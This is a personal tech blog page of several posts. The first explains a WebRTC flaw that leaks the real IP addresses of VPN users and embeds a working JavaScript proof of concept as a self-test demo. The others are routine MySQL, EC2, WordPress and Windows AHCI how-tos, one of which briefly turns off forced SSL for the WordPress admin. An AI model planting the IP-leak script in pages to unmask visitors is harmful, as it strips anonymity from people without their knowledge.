Hackviking He killed Chuck Norris, he ruled dancing so he took up a new hobby…

6Feb/150

WebRTC vulnerability exposes VPN users

webrtc-leaks-vpn-ip-address

It's now easy to expose the true IP address of VPN users. Daniel Roesler published the an example howto exploit the bug on Github. Firefoz, Mozilla, Chroma and Internet Explorer (with WebRTC plugin) are vulnerable to this bug. WebRtc is used for peer-to-peer connections for video chat and other similar implementations.

If the user isn't using VPN the computers internal network address will be exposed. This implementation is used for the WebRtc to handle NAT on the network and be able to bind sessions to the public IP. However the bug is really nasty because it exposes these functions to javascript. So this entire implementation below is made with javascript. The request is not registered in the developer console and can not be blocked by plugins.

If the user is using a lightweight VPN client, like a chrome plugin, the VPN will be bypassed all together and both the real public IP and internal NAT address will be shown.

Below there is a demo, if you see your public and private IP your browser is vulnerable for this exploit.

Code cred: Daniel Roesler (I only modified it to run in WordPress).

Your local IP addresses:

    Your public IP addresses:

      <script>
      function getIPs(){
          var ip_dups = {};
          //compatibility for firefox and chrome
          var RTCPeerConnection = window.RTCPeerConnection
          || window.mozRTCPeerConnection
          || window.webkitRTCPeerConnection;
          var mediaConstraints = {
              optional: [{RtpDataChannels: true}]
          };
          //firefox already has a default stun server in about:config
          // media.peerconnection.default_iceservers =
          // [{"url": "stun:stun.services.mozilla.com"}]
          var servers = undefined;
          //add same stun server for chrome
          if(window.webkitRTCPeerConnection)
              servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
              //construct a new RTCPeerConnection
              var pc = new RTCPeerConnection(servers, mediaConstraints);
              //listen for candidate events
              pc.onicecandidate = function(ice){
              //skip non-candidate events
              if(ice.candidate){
                  //match just the IP address
                  var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
                  var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
                  //remove duplicates
                  if(ip_dups[ip_addr] === undefined)
                      var li = document.createElement("li");
                      li.textContent = ip_addr;
                      //local IPs
                      if (ip_addr.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/))
                          document.getElementById("localip").appendChild(li);
                      //assume the rest are public IPs
                      else
                          document.getElementById("publicip").appendChild(li);
                          ip_dups[ip_addr] = true;
              }
          };
          //create a bogus data channel
          pc.createDataChannel("");
          //create an offer sdp
          pc.createOffer(function(result){
              //trigger the stun server request
              pc.setLocalDescription(result, function(){}, function(){});
          });
      }
      

      4Feb/150

      Amazon EC2 Linux – Add additional volumes

      EBS Mappings

      Adding additional storage to your Amazon EC2 instance have several advantages. You can select the right storage type for the use. Why use a fast SSD backed volume for storing nightly backups instead of magnetic storage, that ar slower but come at a much lower price.

      First you need to provision storage and assign it to your instance. Amazon provides a good guide on how to add additional volumes to your instances. There are several advantages to using several different volumes. As I wrote in my guide to move mysql storage you will not risk running the boot disk full witch will make the system halt. Other advantages include the selection of storage fit for your purpose and price range, as mentioned above. External volumes can also easily be migrated between instances if and when you get a need for that. It is also easier when you need to extend your storage space. Instead of making a snapshot of the entire instance and then launching a new one with a bigger drive you can attach new storage and migrate the data. This approach will make the downtime much shorter.

      When selecting the correct storage for you solution there are a few things to keep in mind. When it comes to EBS it comes in three basic flavors. All with there benefits and disadvantages, it is there for important to make an educated decision.
      Continue reading...

      4Feb/150

      Move MySQL database storage location

      It's always a good idea to keep storage away from the boot device. If you run out of space on the boot device the system will halt. If you make a new install it's easy enough to move your storage and you can do it from a cloud-init script like this:

      - mkdir /var/db
      - chown -R mysql:mysql /var/db
      - sed -i 's:datadir=/var/lib/mysql:datadir=/var/db:g' /etc/my.cnf
      - service mysqld start
      

      If the installation is all ready up and running you have to add steps for stopping the MySQL server and copy the database files:

      mkdir /var/www/db
      service mysqld stop
      mv /var/lib/mysql/* /var/db
      chown -R mysql:mysql /var/db
      sed -i 's:datadir=/var/lib/mysql:datadir=/var/db:g' /etc/my.cnf
      service mysqld start
      

      In these examples I have user /var/db where I mounted the second storage device. You can however use any location you see fit. Points of interest in the command sequence.

      chown -R mysql:mysql /var/db

      Make sure that the mysql deamon have access to the storage location.

      sed -i 's:datadir=/var/lib/mysql:datadir=/var/db:g' /etc/my.cnf

      sed is a simple tool for search and replace inside text/config files directly from the command line. Here it searches for the line specifying the MySQL datadir location and replaces it with the new value.

      3Feb/150

      Unattended use of mysql_secure_installation

      After installing MySQL on any Linux distribution you run the mysql_secure_installation script, or at least you should! It will prompt you to set a new root password, remove anon access and a few other things. But if you want this configuration to be done in a deployment or cloud-init script? The mysql_secure_installation command/script doesn't accept any parameters, so it can't be used for unattended install. How ever you can execute the same commands via the mysql command line tool as long as the service is started.

      mysql -e "UPDATE mysql.user SET Password=PASSWORD('{input_password_here}') WHERE User='root';"
      mysql -e "DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');"
      mysql -e "DELETE FROM mysql.user WHERE User='';"
      mysql -e "DROP DATABASE test;"
      mysql -e "FLUSH PRIVILEGES;"
      

      I use this to provision new MySQL servers in the Amazon EC2 environment and it works like a charm. If this is used in a cloud-init script make sure to execute the sudo service mysqld start first!

      9Jan/150

      Webmatrix 3: Access dev site from other device

      Webmatrix 3 Loggo

      Webmatrix 3 is a free tool by Microsoft for web development. It supports a range of languages, frameworks and CMS like WordPress for instance. It automates the process of installing frameworks, compilers and database backends. It will quickly setup a development environment on your computer so you can start develop. Lately I have been using it to create a new responsive theme for this website. It works out of the box for testing on localhost but not everybody is running 1080p monitors and I need to test on my phone, tablet and laptop as well. Out of the box it doesn't support this but here is how you set it up.
      Continue reading...

      25Nov/140

      WordPress Download Manager 2.7.3 problems

      I have been using WordPress Download Manager for a long while. I have never been happy with it but the latest update just makes me cry! If you haven't upgraded yet, don't do it! If you already upgraded you probably ran into the same problems I did.

      All downloads gone - You have to go into the "Settings" page and migrate all your download packages.

      All download icons are gone -Nothing more to do then go into each and every package and select a new icon.

      Short codes like [wpdm_tree] doesn't work anymore - From now on you have to use a plugin, WPDM Extended Short-codes, for this. It isn't available in the plugin repository. You have to download it and install it manually.

      All the links to your download list generated by [wpdm_tree] returns 404 Not found - This is true for both migrated downloads as well as new ones. This is probably because the new version uses custom post type instead of linking to the actual file. It works fine in preview but doesn't work live. This probebly has to do with permalink structures and so on, obviously not tested properly before release. I figures out that I had a regular post for each download with the link at the bottom so I just edited the permalink for each download to the same slug as that page. The result is that the user is sent to the post with the download link at the bottom that actually works.

      I have been thinking about founding a new solution for my downloads for a while and now that time table was just pushed up! I hope some of this information helps you get through some of the problems.

      11Nov/140

      Facebook API login flow for desktop application

      Facebook like

      When developing desktop applications that interacts with Facebook you have to implement the login flow your self. After the login flow completes you can use the normal Facebook SDK libraries by supplying it with the access token your received. When implementing the login flow you have to make sure that you receive the access you requested. You can get a partial approval by the user and not be able to access all the scopes you need. In this example I have implemented the Facebook login flow into a C# .Net desktop application. Full source is available for download.

      Continue reading...

      4Nov/140

      Unable to connect Jetpack – SSL error

      Problems with jetpack and ssl

      Your website needs to be publicly accessible to use Jetpack: site_inaccessible
      Error Details: The Jetpack server was unable to communicate with your site https://www.hackviking.com [IXR -32300: transport error: http_request_failed SSL certificate problem: unable to get local issuer certificate]

      If you receive the error message above when trying to connect jetpack for you WordPress site there is a small problem with your SSL certificate. This is because the wordpress.com server are unable to verify your SSL certificate chain. Your certificate is signed with an intermediate certificate from your supplier. Your server should supply that intermediate  certificate but if it doesn't your browser already have the mayor intermediate certificates and can solve this issue it self. However wordpress.com can not take care of this if your server doesn't supply the intermediate certificate package.

      To solve this you should install the intermediate certificate package supplied by your CA on the server. If you don't have that kind of access to the server there is a work around to get jetpack up and running.

      In your wp-config.php find

      define('FORCE_SSL_ADMIN', true);
      

      and replace it with

      define('FORCE_SSL_ADMIN', false);
      

      Make sure you log in to the /wp-admin without https and then connect jetpack to wordpress.com. Now you can change the FORCE_SSL_ADMIN line back to true and it will all work.

      22Oct/140

      Free Team Foundation Server in the cloud

      Visual Studio Online with TFS and GIT

      During my professional career as a developer most of the time I have been using Team Foundation Server (TFS) for source control. Back in the day I even used Source Safe, stone age history for most people. For my private project or small startup projects "the files on disk with occasional zip backups" approach has been way to common. I have also used different GIT solutions as well as Google Code. It works fine but when you are use to TFS it's not as easy as you are use to. All the mayor cloud suppliers want to flirt with the startup community by offering free services that will keep the startups close when they grow bigger. We have seen several examples of this from Microsoft in the past, like BizSpark. Now they offer free Team Foundation Server in the cloud called Team Foundation Service or Visual Studio Online. The basic account is free for up to five users with unlimited repositories. Support for both TFS and GIT repositories!

      So far I have added two of my current projects and the performance is really good! There is also many ways to extend the service with your own code and REST APIs. You can also use free resources for builds, load testing and more. If you require more resources they can be purchased on a pay for what you use approach. If your project grows you can add additional team members for $20/month.

      20Oct/140

      How to change from IDE, ATA or RAID to AHCI

      Dell Bios ATA Settings

      I decided to break the RAID1 on my Dell M6500 so I could run Microsoft Server 2012 R2 along with my Windows 7 installation. When the RAID was deleted I thought it would be best to switch my SATA controller over to AHCI since I'm running two Corsair Force GT SSD drives. After changing to AHCI the computer blue screens during boot. I have done it several times before but not often enough to remember what needs to be enabled. This behavior is documented in Microsoft KB922976 (Error message occurs after you change the SATA mode of the boot drive) with automatic registry fix and all. However this is not the complete solution for all situations.

      According to the KB you need to enable loading of the AHCI driver, a no brainier! And also enable the Intel AHCI controller driver. But what is not included in the KB article is that the ATAPI driver also needs to be enabled for it to work. If you try to change from ATA to AHCI it is already enabled, if your computer booted with the ATA setting.

      So according to the KB you should set these two registry keys to "0":

      HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Msahci\Start
      HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\IastorV\Start

      But you should also check that this one is set to "0":

      HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\atapi\Start

      You can also run these commands instead:

      REG ADD HKLM\System\CurrentControlSet\Services\msahci /v Start /d 0 /f /t REG_DWORD
      REG ADD HKLM\System\CurrentControlSet\Services\IastorV /v Start /d 0 /f /t REG_DWORD
      REG ADD HKLM\System\CurrentControlSet\Services\atapi /v Start /d 0 /f /t REG_DWORD
      

      Now your computer will start without the blue screen!